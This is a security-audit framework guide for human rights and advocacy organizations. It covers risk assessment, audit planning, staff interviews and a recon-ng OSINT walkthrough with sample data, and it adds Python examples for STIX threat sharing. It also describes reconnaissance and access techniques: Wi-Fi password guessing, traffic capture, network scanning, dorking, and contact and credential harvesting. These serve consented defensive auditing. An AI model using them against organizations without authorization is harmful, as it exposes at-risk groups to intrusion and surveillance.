A Security Auditing Framework and Evaluation Template for Advocacy Groups

Guide

License

SAFETAG resources are available under a Creative Commons Attribution-ShareAlike 3.0 Unported (CC BY-SA 3.0) License

The audit framework and checklist may be used and shared for educational, non-commercial, not-for-profit purposes, with attribution to Internews. Users are free to modify and distribute content under conditions listed in the license.

The audit framework and checklist is intended as reference and the authors take no responsibility for the safety and security of persons using them in a personal or professional capacity.

Attribution for content from other Licenses

Usage of "SAFETAG"

SAFETAG is itself a framework and template for organizational audits. As such, audits performed which use or adapt SAFETAG materials may be referred to as "adapting the SAFETAG methodology" or "based on the SAFETAG framework", and similar phrasings, but may NOT be called "SAFETAG audits".

This is not intended to imply that an audit using any or all of the SAFETAG materials needs to refer to SAFETAG at all.

This usage policy does not affect the distribution of SAFETAG materials, covered in the license statement above.

Introduction

The Security Auditing Framework and Evaluation Template for Advocacy Groups (SAFETAG) is a professional audit framework that adapts traditional penetration testing and risk assessment methodologies to be relevant to small, non-profit, human rights organizations based or operating in the developing world, taking into account the capacity constraints and unique threats faced in this community.

SAFETAG uses assessment activities derived from standards in the security auditing world and best-practices for working with small scale at-risk organizations to provide organization driven risk assessment and mitigation consultation. SAFETAG auditors lead an organizational risk modeling process that helps staff and leadership take an institutional lens on their digital security problems, conduct a targeted digital security audit to expose vulnerabilities that impact the vital processes and assets identified, and provide post-audit reporting and follow up that helps the organization and staff identify the training and technical support that they need to address needs identified in the audit, and in the future.

[email protected] | https://safetag.org

The SAFETAG Audit Framework Core

The SAFETAG audit consists of multiple information gathering and confirmation steps, as well as research and capacity-building exercises with staff, organized into a collection of objectives. Each objective supports the two core goals of SAFETAG: creating a risk assessment while also building the capacity of the organization.

These objectives provide collections of approaches and activities for gathering and verifying information through both technical and interactive/social methods, for assessing and building capacity, and targeted exercises with walk-through instructions for many of these.

These are not meant to be a "checklist" or even a prescribed set of actions -- indeed, experienced auditors will deviate strongly from many of the specific activities. These provide a focused "minimal set" of activities only.

Indeed, many objectives and their specific exercises overlap or can be done together -- on-site interviews with staff can coincide with assessing their devices and keeping one's eyes open for physical security issues. The data assessment exercises may provide enough information that other staff engagements are unnecessary.

The Life Cycle of an Audit

The audit process is very cyclical. Newly identified threats, vulnerabilities, capabilities, and barriers impact activities that have already been run and those that have yet to be run. At the same time the auditor, through conversations, training, and group activities, is actively building the organization's agency and addressing time-sensitive or critical threats that can be handled within the time frame. This iterative process eventually leads to a point where the auditor is confident they have identified the critical issues and the low-hanging fruit, and is confident the organization is capable of moving forward with their recommendations.

Each objective requires a certain base of information, and outputs more information into this cyclical process. Each objective has a "map" of the data flow that it and its specific activities provide based on this map:

SAFETAG Data Flow

While more completely defined below in the Risk Assessment and Agency Building sections, a brief overview of the data flow components:

To make SAFETAG approachable, a core evaluation template which links together a series of specific objectives, each with a variety of linked activities, that contribute towards the goals and their required information needs is represented here. Experienced Auditors will likely come up with their own approaches, and the SAFETAG project welcomes such contributions.

Risk Assessment & Analysis

Functionally, SAFETAG is a digital risk assessment framework. Risk assessment is a systematic approach to identifying and assessing risks associated with hazards and human activities. SAFETAG focuses this approach on digital security risks. A SAFETAG audit will work to collect the following types of information in order to assess the risks an organization faces.

Risk is the current assessment of the possibility of harmful events occurring. Risk is assessed by comparing the threats an actor faces with their vulnerabilities, and their capacity to respond to or mitigate emergent threats.

The SAFETAG evaluation revolves around collecting enough information to identify and assess the various risks that an organization and its related actors face, so that they can take action strategically.

The Risk Equation

Program Analysis

Program analysis identifies the priority objectives of the organization and determines its capacities. This process exposes the activities, actors, and capacities of an organization.

Activities

Definition: The practices and interactions that the organization carries out in order to accomplish their goals.

Example: This includes any activity that the organization carries out to accomplish its goals and those that allow the organization to function (publishing, payment, fund-raising, outreach, interviewing.)

Actors

Definition: The staff, volunteers, partners, beneficiaries, donors, and adversaries associated with the organization.

Example: The core organizational staff; the volunteers; maintenance, cleaning, security, or other non-critical staff; the partner organizations; the individuals and groups that the organization provides services to; groups of unorganized individuals who are opposed to the organization's aims; and governmental and non-governmental high-power agents and organizations that are opposed to the organization's aims.

Vulnerability analysis

Understand the organisation’s exposure to threats, points of weakness and the ways in which the organisation may be affected.

Vulnerability

Definition: An attribute or feature that makes an entity, asset, system, or network susceptible to a given threat.

Example: This can include poorly built or unmaintained hardware, software, or offices as well as missing, ignored, or poor policies or practices around security.

Threat Analysis

Threat analysis is the process of identifying possible attackers and gathering background information about the capability of those attackers to threaten the organization. The basis of this information is a potential attacker's history of carrying out specific threats, their current capability to carry out those threats, and evidence that the attacker intends to leverage resources against the target.

Threat

Definition: A threat is a possible attack or occurrence that has the potential to harm life, information, operations, the environment, and/or property.

Example: Threats can range from fire, or flood, to targeted malware, physical harassment, or phishing attacks.

Threat History

Definition: What types of threats the attacker has used historically, and what types of actors have been targeted by those threats.

Example:

Threat Capability

Definition: The means that the attacker has to carry out threats against the organization.

Example: This includes, but is not limited to technical skill, financial support, number of staff hours, and legal power.

Threat Intent

Definition: The level of desire for the attacker to carry out threats against the organization.

Example: Intent can be goals or outcomes that the adversary seeks; consequences the adversary seeks to avoid; and how strongly the adversary seeks to achieve those outcomes and/or avoid those consequences.

Agency Building

SAFETAG differs from many risk assessment tools because it aims to build the host's and staff's capacity so that they are able to address the risks that the auditor has identified. SAFETAG is designed to provide in-audit activities and training that increase an organization's agency to seek out and address security challenges within their organization. To do this an auditor must collect information that allows them to identify organizational areas of strength and weakness (expertise, finance, willingness to learn, staff time, etc.).

A common refrain, among auditors, software developers and other specialists in this sector, is that digital security is not about technology; it is about people. This is undeniably true, and even the previous SAFETAG modules — despite their more direct fixation on technology — acknowledge this insight by emphasizing the educational and persuasive roles played by your findings report.

Capacity

Definition: The combination of strengths, attributes and resources available within the organization that can be used to reduce the impact or likelihood of threats.

Example: This includes, but is not limited to technical skill, financial support, staff and management time, relationships, and legal power.

Barriers

Definition: The combination of weaknesses, assumptions, regulations, social or cultural practices, and obligations that get in the way of an organization implementing an effective digital security practice.

Example: Examples can include a lack of funding, lack of authority within an organization to mandate practices to their staff, resistance to change, high staff turnover, or digital illiteracy.

Operational Security

"Also be aware that local groups may not be able to accurately gauge the safety of their communications with you. Sometimes they underestimate the likelihood of risk - at other times, they can wildly overestimate the risk. Either way, trainers need to navigate these issues carefully and respectfully with a "do no harm" approach that respects the reported needs, context, and experiences of your local contact and potential trainees." - Needs Assessment: Level-Up 1

Summary

Below are the baseline operational security guidelines for a SAFETAG audit. Activity specific operational security guidelines are contained within each activity.

Purpose

An audit uncovers an array of sensitive information about an organization. For some at-risk populations the mere act of getting a digital security audit can increase their likelihood of being actively attacked by an adversary. The foundation of the SAFETAG process is the goal of increasing the safety of the host organization, its staff, and the auditor. It is vital that an auditor weigh the possible risk an audit may incur on the organization or the auditor against the possible outcomes of an audit.

Approaches

Resources

SAFETAG Methods

Preparation

Summary

This component consists of trip preparation activities that are needed to ensure the technical and facilitated components of the audit are able to be conducted effectively and within the on-site time-frame and in coordination with the organization.

Purpose

A SAFETAG audit has a short time frame. Preparation is vital to ensure that time on the ground is not spent negotiating over the audit scope, updating the auditors systems, searching for missing hardware, or refreshing oneself with the SAFETAG framework. To that end negotiations with the host organization help reveal if the organization has the capacity to undertake the audit and respond to its findings.

Guiding Questions

The Flow of Information

Preparation Information Flow

Approaches

Outputs

Operational Security

Resources

Facilitation Preparation

Password Dictionary Creation

Other Pre-Engagement Resources

Incident Handling Resources

Data Security Standards

Sensitive Data & Information Guides

Incident Handling Resources

Activities

Assessment Plan

Summary

This component allows an auditor and host to come to an understanding of the level of access that an auditor will have, what is off limits, and the process for modifying the scope of the audit when new information arises. [13,14] This component consists of a process where the auditor collaboratively creates an assessment plan with key members of the organization.

A core tenet of SAFETAG is building agency in organizations to improve their digital security. To that end, collaboratively creating an assessment plan with the organization helps to clarify not only the audit scope - from discussing what sensitive data may be exposed to what systems may be disrupted in the process of the audit - but it also helps reveal the ability of the organization to support and respond to the audit findings.

Overview
Materials Needed
Considerations
Walkthrough

Auditors are encouraged to use, or at least reference, the SAFETAG Agreement Generator, a python script which provides a decision tree covering the above points, and builds a basic, clear-language agreement which can be translated and formalized as needed. Sample outputs and a diagram of the full decision tree are available in the "outputs" folder of the Agreement Generator repository. This replaces the draft agreement previously part of SAFETAG.

Recommendation

Confidentiality Agreement

Summary

Negotiate an agreement with the organization that outlines how an auditor will protect the privacy of the organization and the outcomes of the audit.

Overview
Materials Needed
Considerations
Walkthrough

See the Appendix for a DRAFT Engagement and Confidentiality Agreement. See also the in-progress SAFETAG Agreement Generator for more advanced and flexible "plain language" agreement text and guidance on selecting which clauses to include.

Recommendation

Incident Response and Emergency Contact

Summary

Incident Response sets up a procedure for identifying what counts as an incident during an audit, as well as incident handling and response in the event that the auditor causes or uncovers a security incident during the course of the assessment. [29,30]

It is important to know these procedures for handling incidents in order to protect data integrity and the audit trail used for investigation and collection of information.

Overview

Materials Needed
Considerations
Walkthrough

What counts as an incident should be agreed with the organization's management during the agreement phase, and should include possibilities informed by the Context and Technical Research work.

Incidents can include problems such as insider threats, active remote access malware, or the discovery of physical surveillance of the office, as well as many other possibilities. The auditor must use their best judgement along with the SAFETAG Auditor Code of Conduct, their agreement with the organization, personal ethics, and legal responsibilities, and balance this in the frame of the organization's context, capacity, and the need to gain the trust of the organization's staff in good faith in order to complete a successful audit.

Malware / Remote Access

For the implementation of mitigation measures, you can refer the auditees to a third party. This may be the organization's IT staff, a rapid response helpline, a malware researcher, etc.

Some of the mitigation steps can be implemented by the user, following the instructions included in the Rapid Response Network's Digital First Aid Kit.

You should consider a compromise serious and coordinate an incident response if any of the following is happening:

Possible mitigation steps are below. This step should not take more than 2 hours, and the auditor should coordinate the response, rather than carry it out themselves. The auditor should keep in mind the organization's capacity and be extremely careful when reformatting devices, as there may be critical programs which the organization does not have the installation media / license keys for any more, or critical data on the disk which did not come up in other discussions. Check to see if the organization has trustworthy operating system installation media and license keys. In almost every situation, these mitigations should be done post-audit so as to ensure the audit itself has time to complete and be thorough.

Insider Threat

Insider Threat refers to any threat to an organization that comes from within the organization. These can include (but are not limited to):

- Employees
- Former employees
- Contractors
- Interns

Active Surveillance

To be developed.

Travel Checklist

See the Appendix for a sample travel kit / checklist

Audit Timeline and Planning

Review these notes in preparation for the audit as you begin to map out your schedule. This provides a rough, suggested outline of how to schedule your time on site for a SAFETAG audit, and some reminders of the work you need to have completed before arriving in country.

Prepare for Uncertainty

The SAFETAG roadmap is a crisp, clear data flow of inputs to outputs. Reality, generally speaking, is less direct. There are a few core parts of the audit process that force action, but others are more flexible. Outcomes of your discussions and exploration of the network will also derail the process in impossible-to-predict ways. The pre-audit interviews and your own context research, research on the organization, and preparation are meant to give you the best possible idea of what situation you'll walk into, but even with all of that, frankly, shit happens.

Before Travel

First Day

Priorities for the first day include meeting staff (even, possibly especially, for the more technical auditor). There is a strong temptation to dive in and get started, but establishing connections with the staff - especially those you haven't met through interviews - is key. You may discover hidden sources of talent or resistance, historical information, and new parts of the infrastructure or practices and policies that you may not have yet found.

Early steps

From a data-gathering point of view, the first steps are to try and access the wireless network by password guessing, but also to connect to the network and capture traffic for analysis overnight. This provides other views on the actual technology and services used on the network, different both from the management and IT view as well as other tools discussed by staff.

First or Second day

Further Days (on Location)

The next day you're on location, you have hopefully looked through the research data you gathered, and have some specific follow-up things to investigate. It's also now time to start going through the audit tasks.

Final Day (on Location)

Exploration and check-ins

Throughout the entire audit, aggressively make time to engage with staff - stop for coffee, eat lunch with them, have conversations. This can be integrated into other parts of the process, such as the user device assessments, as well as being completely independent and natural. Having better connections with staff will make the group exercises, especially the risk assessment work, flow much better.

Whenever you set off a scan (airodump-ng, nmap, OpenVAS, ...) is a good time to stand up and walk around.

Debrief and Setting Expectations

Largely covered in the debrief section, making time at the end of the (often hectic) audit week is very important to making sure the next few steps are absolutely clear in terms of timelines and communication protocols.

Clean up

If you have been using paper or post-it notes during the audit, be sure you securely destroy them (by shredding, burning, or tearing into small pieces) before you leave the site on the last day. By the same token, any digital reports should be stored on secure media and securely deleted from all other locations. See the operational security section and per-item notes for further details. Clean off any whiteboards used, and check any camera used to remove sensitive photos.

Follow up care and Reporting

See the reporting sections for specific details here, but a series of check-ins with the organization to support their ability to respond to any incidents, understand further topics from the debrief, and to help provide them a timeline to expect the final report is valuable in maintaining their engagement post-audit to support the needed changes.

Context Research

Summary

This component allows the auditor to identify the relevant regional and technological context needed to provide a safe and informed SAFETAG audit. This component consists of desk research that is collected and analyzed by the auditor, as well as inputs from the Interview component.

Purpose

Analysis of context is the foundation of effective risk management. Both at-risk organizations and auditors will develop assumptions based upon their experience. It is important that an audit is based on information that is current and accurate.

Checking the assumptions both of the organization and of the auditor by researching the current regional and technological context will ensure that an auditor is basing their work on accurate assessments of the conditions the organization faces and that they are making informed operational security considerations.

The Flow of Information

Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Other Context Analysis Methodologies

Threats to the Auditor

Have aid workers faced retribution for their work in the region?

Is it safe to do digital security work in the region?

Is the area safe to travel to?

Targeted Threats for the organization

Is the group facing any legal threats because of its work?

Does the organization face any targeted threats because of their work?

General Threats for the organization

What general non-governmental threats does the organization face?

What cyber-security practices is the government using?

What general cyber-security threats is the organization facing?

What level of technology is available in the region?

Activities

Conduct Interviews

NOTE: Covered in full under Capacity Assessment

Regional Context Research

Summary

This exercise focuses on research and re-confirmation of regional issues from general trends to specific legal restrictions and safety concerns, as well as current news and persistent challenges.

Overview
Materials Needed
Considerations
Walkthrough

Cross-check reports on regional threats facing organizations with their focus area.

Identify any legal risks associated with conducting the audit. Secure communications and storage, network forensics, device exploitation, digital security training.

Identify any infrastructural barriers to adopting digital security practices.

Explore the security landscape of hardware and software identified in interviews by conducting a basic vulnerability analysis.

Technical Context Research

Summary

This exercise focuses on research into the technical capacity of potential threat actors, including both historical attack data and any indicators of changes to their capacity. Auditors are encouraged to create a summary of their findings for inclusion in the audit report and for sharing (if operational security and the agreement with the organization permits) among trusted networks.

Overview
Materials Needed
Considerations
Walkthrough

Thoroughly research technical attack history for the country/region, with a focus on identifying attacks which may target the work of the organization. Auditors are advised to track both capability (known attacks and tools) and intent (attempts to acquire tools, changes in policies, public statements). For auditors who intend to share their research efforts, it is incredibly useful to include key quotes and data directly in the relevant sections of this document, providing a reference or link back to the original report. This allows future reviewers to more immediately understand your assessment, what it has and has not included, and incorporate new material.

It is useful to organize the research into the following categories.

Keep a separate running list for:

- Targeted Populations (Are specific types of people targeted/surveilled due to their identity/race/background?)
- Targeted Activities (Are specific activities abnormally targeted, e.g. protests, calls for government transparency, etc.?)
- Sensitive Events (Are there specific historic/anniversary/holiday dates, upcoming elections (https://www.ndi.org/elections-calendar), or other known events to be noted?)
- Sources and New Additions (What resources have you found?)

If the country(ies) of interest are in the Freedom on the Net report, you will be able to gather a great deal of baseline information across all the sections by reading through the relevant country reports. The key internet controls found in the Freedom on the Net report ( https://freedomhouse.org/report/key-internet-controls-table-2016 ) guided many of the categories used here, reducing the effort required to create a baseline report. More advanced reporting could include references to the CAPEC (Common Attack Pattern Enumeration and Classification) taxonomy, and auditors may also be interested in leveraging the STIX standard to better automate sharing and further research into specific threats using threat information sharing platforms.

Additional organizations which regularly release in-depth digital security focused country reports which are strongly recommended to review in creation of an assessment are listed below. These sources often link to their primary sources or other groups doing dedicated research on the country or topic for further research. In addition, sub-sections list topic-specific research ideas.

Below are definitions and resources for the research categories which can help build out a country or regional assessment useful for the auditor, the organization, and for the broader organizational security community.
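The guide mentions STIX as a way to share technical context research. As an added example (not part of the SAFETAG guide or any SAFETAG tool), the script below packages the three threat-analysis fields the guide asks for (Threat History, Capability, Intent) and the running lists above (targeted populations/activities, sensitive events, sources) into a STIX 2.1 bundle using only the standard library, and checks that every cross-reference in the bundle resolves. The actor, dates, and source entry are constructed sample values; the vocabularies are those of the STIX 2.1 specification.

```python
"""Map SAFETAG threat-research notes onto STIX 2.1 objects (added example)."""
import json
import uuid
from datetime import datetime, timezone

# STIX 2.1 open vocabularies (OASIS spec) used to sanity-check auditor input.
SOPHISTICATION = {"none", "minimal", "intermediate", "advanced", "expert",
                  "innovator", "strategic"}
RESOURCE_LEVEL = {"individual", "club", "contest", "team", "organization",
                  "government"}
ACTOR_TYPES = {"activist", "competitor", "crime-syndicate", "criminal",
               "hacker", "insider-accidental", "insider-disgruntled",
               "nation-state", "sensationalist", "spy", "terrorist", "unknown"}


def _stix_id(obj_type):
    return f"{obj_type}--{uuid.uuid4()}"


def _now():
    return datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")


def _common(obj_type):
    ts = _now()
    return {"type": obj_type, "spec_version": "2.1", "id": _stix_id(obj_type),
            "created": ts, "modified": ts}


def threat_actor(name, history, capability, intent, actor_type,
                 sophistication, resource_level, first_seen, sources):
    """Threat History -> description/first_seen, Capability -> sophistication/
    resource_level, Intent -> goals, Sources -> external_references."""
    if sophistication not in SOPHISTICATION:
        raise ValueError(f"sophistication must be one of {sorted(SOPHISTICATION)}")
    if resource_level not in RESOURCE_LEVEL:
        raise ValueError(f"resource_level must be one of {sorted(RESOURCE_LEVEL)}")
    if actor_type not in ACTOR_TYPES:
        raise ValueError(f"actor_type must be one of {sorted(ACTOR_TYPES)}")
    obj = _common("threat-actor")
    obj.update({
        "name": name,
        "description": f"History: {history}\nCapability: {capability}",
        "first_seen": first_seen,
        "threat_actor_types": [actor_type],
        "sophistication": sophistication,
        "resource_level": resource_level,
        "goals": list(intent),
        "external_references": list(sources),
    })
    return obj


def targeted_identity(name, identity_class):
    """Identity for a Targeted Population ('class') or Targeted Activity entry."""
    obj = _common("identity")
    obj.update({"name": name, "identity_class": identity_class})
    return obj


def targets(actor, identity):
    """'targets' relationship from a threat-actor to an identity."""
    obj = _common("relationship")
    obj.update({"relationship_type": "targets",
                "source_ref": actor["id"], "target_ref": identity["id"]})
    return obj


def sensitive_event_note(text, about):
    """Sensitive Events have no STIX object; record them as a note."""
    obj = _common("note")
    obj.update({"abstract": "Sensitive event", "content": text,
                "object_refs": [o["id"] for o in about]})
    return obj


def build_bundle(objects):
    return {"type": "bundle", "id": _stix_id("bundle"), "objects": list(objects)}


def unresolved_refs(bundle):
    """Ids referenced by relationships or notes that are missing from the bundle."""
    ids = {o["id"] for o in bundle["objects"]}
    missing = []
    for o in bundle["objects"]:
        refs = [o.get("source_ref"), o.get("target_ref")] + o.get("object_refs", [])
        missing += [r for r in refs if r and r not in ids]
    return missing


def sample_bundle():
    """Constructed, fictional actor profiled with the SAFETAG fields."""
    actor = threat_actor(
        name="Example Actor (constructed)",
        history="Phishing campaigns against regional media outlets since 2014.",
        capability="Commodity malware, domain registration, legal pressure.",
        intent=["Identify sources of investigative reporting"],
        actor_type="nation-state", sophistication="intermediate",
        resource_level="government", first_seen="2014-01-01T00:00:00.000Z",
        sources=[{"source_name": "Freedom on the Net key internet controls",
                  "url": "https://freedomhouse.org/report/key-internet-controls-table-2016"}])
    population = targeted_identity("Independent journalists (constructed)", "class")
    event = sensitive_event_note("Election period (constructed date: 2016-11-08)",
                                 [actor, population])
    return build_bundle([actor, population, targets(actor, population), event])


if __name__ == "__main__":
    print(json.dumps(sample_bundle(), indent=2))
```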

Capacity Assessment

Summary

In this component the auditor engages with staff through interviews and conversations to identify the organization's strengths and weakness (expertise, finance, willingness to learn, staff time, etc.) to adopting new digital and physical security practices. The auditor uses this information to modify the audit scope and recommendations accordingly.

Purpose

Knowing an organization's strengths and weaknesses allows the auditor to provide more tailored recommendations that an organization will be more likely to attempt and achieve. The auditor will use this assessment in preparing for the audit itself as well as when evaluating the difficulty of a recommendation. This information also provides a starting place for understanding the organization's current use and understanding of technology, digital security, and current threat landscape, as well as revealing elements of an organization's workflow, infrastructure and even vulnerabilities that you might otherwise have overlooked.

The Flow Of Information

Audit Preparation Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Background Interview Approaches

Activities

Interviews

Summary

The auditor conducts interviews with various staff members to gather information on the organization's risks and capacity.

Q&A sessions are unabashedly white box aspects of a security assessment, and you will occasionally hear push-back along the lines of, "You wouldn't have found that thing if we hadn't told you about this other thing." Compelling black box findings certainly do have an advantage when it comes to persuasiveness, but obtaining them can be quite time-consuming, so relying exclusively on vulnerabilities that you can identify without "help" is generally a mistake in this resource-constrained sector.

Overview
Materials Needed
Considerations
Walkthrough

The questions below are roughly divided into categories for management, program staff, and technical staff. The questions for technical staff may be best asked of the manager or another point of contact. Within that section, there are specific questions that often only actual IT staff are likely to be able to answer. An auditor may find value in re-asking the same questions to multiple staff members. Specifically, however, the "Baseline Threat Identification Questions" should be asked of whoever the auditor feels most able or willing to answer them.

In all cases, the HCD Toolkit recommends that you "warm up the participant with questions they are comfortable with" [36] -- balance this against not asking questions which you should already know from basic organizational research -- followed with informative questions which "prompt bigger, even aspirational, thinking that they may not be accustomed to on a daily basis." [37]

Management and Baseline Questions

Go Specific

"Dig deeper on the challenge at hand & prompt with ‘what if’ scenarios."

Go Personal

"Dig deeper on the practices outside of work & prompt with ‘what if’ scenarios."

Program Staff Questions

For organizations with significant online operations/programs, the following questions may be asked of the management point of contact and/or a program staff member.

Technical Staff Questions

Ask these of the most technical staff member you are in touch with. If the organization has dedicated IT support, this section also includes specific questions for IT.

IT Only

Baseline Threat Identification Questions
Questions for Known High Risk Organizations

See Guiding Questions for High Risk Organizations if there are concerns that the organization may be targeted by advanced threat actors.

Guiding Questions for High-Risk Organisations

Summary

This additional interview activity is to identify if there are any indicators that the organization may have already been attacked and/or compromised, or if someone they know has faced advanced threats. It should help identify what threats / threat actors they are dealing with, and their intent. This will help the auditor prioritize work with the organisation during the audit and follow up and understand whether the auditor has the expertise to address or understand the threat or if outside expertise is needed.

Overview
Materials Needed

~45 minutes per interview / staff member

1 hr interview as an organization, depending on organisational culture

Considerations

Operational Security

Psychological Considerations

Walkthrough

Individual Interview

Group Interview

NOTE: Remind the staff that if it's not public within the organisation and/or happened to a personal account, then don't share it during this session.

NOTE: Repeat above questions per incident

NOTE: Could lead to further conversations about what data they have, what assets are the most important, sensitive and possibly targeted

Recommendation

Recommendations will depend on the advanced threats raised during the interview. See the Advanced Threat method for details.

Capacity Assessment Checklist

Summary

A monolithic, one-time interview with key staff is not always possible or advisable, but interacting with a variety of staff exposes valuable information about every aspect of the audit, from vulnerabilities to capacity to hidden barriers. This serves as a "cheat sheet" of some topics to explore both during the planning and preparation phase and throughout the audit process.

Walkthrough

"Homework"

Organizational

Contextual / Background / Threat information

Technical

Preparation Support

Practices and behaviors

Reconnaissance

Summary

The remote assessment methodology focuses on direct observation of an organization and its infrastructure, consisting of passive reconnaissance of publicly available data sources ("Open Source Intelligence"). This allows the auditor to identify publicly available resources (such as websites, extranets, email servers, but also social media information) connected to the organization and remotely gather information about those resources.

Purpose

While much of SAFETAG focuses on digital security challenges within and around the office, unintended information available from "open sources" can pose real threats and deserves significant attention. This also builds the Auditor's understanding of the organization's digital presence and will guide which specific vulnerabilities to investigate once on site.

The Flow Of Information

Reconnaissance Information Flow (figure)

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

This Section:

Resources

Open Source Intelligence (General)

Organizational Information Gathering

Searching

Pastebin Searching

Recon-ng

Activities

Manual Reconnaissance

Summary

This exercise suggests some targeted online search tools and tricks to gather information leakages from organizations. While many advocacy, activism, and media/journalism focused organizations are very public as part of their operations, the searches suggested here aim to explore data that could be used to better attack or socially engineer an organization.

Overview
Materials Needed
Considerations
Walkthrough

These custom and more manual approaches work excellently in combination with automated tools such as recon-ng or the commercial Maltego. Working with both these tricks and the automated tools, feeding information learned from one back to the other, is a powerful way to unearth large amounts of information about an organization.

Most of the tools and further guidance are well covered in the references for the Reconnaissance method; a small selection of starting points is mapped out below.

Take care, however, not to waste time on this: using image information tools on every photo on an organization's website, or researching every linked social media account, may not provide further valuable information. Step back and judge the value of digging deeper: are you finding adversaries? Are you finding information that the organization may not want online? Are there other methods which might be more appropriate to apply?

Search Engines

Google dorking tricks:

Social Media / Account Discovery
Additional Tools
Pastebin Searching
Working with Images
Recommendation

Automated Reconnaissance

Summary

This component allows the auditor to quickly identify publicly available resources (such as websites, extranets, email servers, but also social media information) connected to the organization and remotely gather information about those resources.

Overview
Materials Needed
Considerations
Walkthrough

Both Recon-ng and FOCA are open source reconnaissance tools with many available plugins. FOCA is, out of the box, more aimed at extracting metadata from documents and images, whereas Recon-ng is slightly more focused on digging into domains, subdomains, contacts, and more network-level information. Both tools are best used in addition to critical thinking and manual exploration, and require "seed" inputs to get started and careful curation to remove false leads.


Recon-ng

Installing Recon-ng

For full instructions, see the Recon-ng Getting Started Instructions

Using Recon-ng

NOTE: This guide is based upon the data flow documentation from the Recon-ng website

By pressing tab twice you can use auto-completion.

[recon-ng][default] >
add         exit        load        record      search      show        use
back        help        pdb         reload      set         spool       workspaces
del         keys        query       resource    shell       unset

This works even in commands.

[recon-ng][default] > show
banner           credentials      hosts            locations        options          schema
companies        dashboard        keys             modules          ports            vulnerabilities
contacts         domains          leaks            netblocks        pushpins         workspaces

Using recon modules

The recon modules are named in a very specific fashion to help the user understand the flow of data inside the tool. Modules use the syntax <methodology step>/<input table>-<output table>/<module>. The input table is the first part of the middle segment and the output table is the second part; the module name itself is the tool used to process the data. So recon/domains-hosts/brute-hosts takes domain names (websitename.org) as input and outputs hostnames (extranet.websitename.org, etc.). If you provide only the name of a specific module, recon-ng can figure out the full path (though tab completion doesn't help); for example, use breachalarm works just as well as use recon/contacts-creds/breachalarm.

You can also search modules by their inputs or outputs: search domains- displays all modules that take domain names as their input, and search -contacts displays all modules that output contact information.
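To make the naming convention concrete, here is an added example (not recon-ng's own code) that parses paths of the form <methodology step>/<input table>-<output table>/<module> and reproduces the search and bare-name lookup behaviour described above on a constructed module list. The module list, the helper names and the "index by output table" view are assumptions made for the example, not features of recon-ng.

```python
from __future__ import annotations

from dataclasses import dataclass

# Constructed module list in recon-ng's naming convention; the paths are
# taken from the walkthrough on this page, not read from a live install.
SAMPLE_MODULES = [
    "recon/domains-domains/brute_suffix",
    "recon/domains-hosts/baidu_site",
    "recon/domains-hosts/brute_hosts",
    "recon/netblocks-hosts/reverse_resolve",
    "recon/netblocks-hosts/shodan_net",
    "recon/netblocks-ports/census_2012",
    "recon/contacts-creds/breachalarm",
    "reporting/csv",
]


@dataclass(frozen=True)
class ModulePath:
    step: str                 # methodology step: recon, reporting, ...
    input_table: str | None   # table the module reads (None for reporting)
    output_table: str | None  # table the module writes
    name: str                 # the tool that does the work
    raw: str


def parse_module(path: str) -> ModulePath:
    """Split <step>/<input>-<output>/<name>; two-part paths carry no tables."""
    parts = path.split("/")
    if len(parts) == 3:
        step, tables, name = parts
        src, sep, dst = tables.partition("-")
        if not sep or not src or not dst:
            raise ValueError(f"expected <input>-<output> in {path!r}")
        return ModulePath(step, src, dst, name, path)
    if len(parts) == 2:
        step, name = parts
        return ModulePath(step, None, None, name, path)
    raise ValueError(f"not a module path: {path!r}")


def search_modules(pattern: str, modules: list[str] = SAMPLE_MODULES) -> list[str]:
    """Behave like `search <pattern>`: a substring match on the full path, so
    'domains-' lists modules that consume domains and '-hosts' those that
    produce hosts."""
    return sorted(m for m in modules if pattern in m)


def resolve_module(name: str, modules: list[str] = SAMPLE_MODULES) -> str:
    """Behave like `use <name>`: accept a full path, or a bare module name
    when exactly one module carries it."""
    if name in modules:
        return name
    matches = [m for m in modules if parse_module(m).name == name]
    if len(matches) != 1:
        raise LookupError(f"{name!r} matches {len(matches)} modules")
    return matches[0]


def modules_by_table(modules: list[str] = SAMPLE_MODULES) -> dict[str, list[str]]:
    """Index modules by the table they produce, which shows which seed data
    (domains, netblocks, contacts) unlocks which kind of discovery."""
    index: dict[str, list[str]] = {}
    for m in modules:
        mp = parse_module(m)
        if mp.output_table:
            index.setdefault(mp.output_table, []).append(m)
    return index


if __name__ == "__main__":
    for pattern in ("netblocks-", "-hosts", "-contacts"):
        print(pattern, "->", search_modules(pattern))
    print("breachalarm ->", resolve_module("breachalarm"))
```

Reading the index by output table is a quick way to plan a session: it tells you which seeds you must collect from the organization before a given discovery step becomes possible.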

Preparing

Set verbose output on for the rest of this guide so that you can see everything that happens (recommended when starting out).

[recon-ng][default] > set VERBOSE True

You can use auto completion to see all the possible keys you can add.

[recon-ng][websitename] > keys add
bing_api           facebook_secret    google_cse         jigsaw_username    pwnedlist_iv       twitter_api
builtwith_api      facebook_username  ipinfodb_api       linkedin_api       pwnedlist_secret   twitter_secret
facebook_api       flickr_api         jigsaw_api         linkedin_secret    shodan_api         virustotal_api
facebook_password  google_api         jigsaw_password    pwnedlist_api      sonar_api

Choose and add a key.

[recon-ng][default] > keys add bing_api TYPE_THE_KEY_VALUE_HERE
[*] Key 'bing_api' added.

You can list keys by using the command keys list Reference the Creating API Keys Section below for quick links to setting up popular APIs.

First steps

NOTE: This walkthrough is using sample data. Results will vary widely depending on the organization you are working with.

[recon-ng][default] > workspaces add websitename
[recon-ng][websitename] >
[recon-ng][websitename] > workspaces select default
[recon-ng][default] >
[recon-ng][default] > workspaces select websitename
[recon-ng][websitename] >

Display possible seed information by using auto-completion.

[recon-ng][default] > add
companies        credentials      hosts            locations        ports            vulnerabilities
contacts         domains          leaks            netblocks        pushpins

We will only use the organization's name, one domain, two netblocks (that we got by searching for other domains and pinging them), and two e-mail addresses of the organization we are looking at, so we will add those.

First, add the company name.

[recon-ng][websitename] > add companies
company (TEXT): Websitename
description (TEXT):

Next, add the domain.

[recon-ng][default] > add domains websitename.org
[recon-ng][websitename] > show domains

  +--------------------------------+
  | rowid |     domain    | module |
  +--------------------------------+
  | 1     | websitename.org | base   |
  +--------------------------------+

[*] 1 rows returned

Next, add contacts. We don't know much, but we will add what we know.

[recon-ng][websitename] > add contacts
first_name (TEXT): Bob
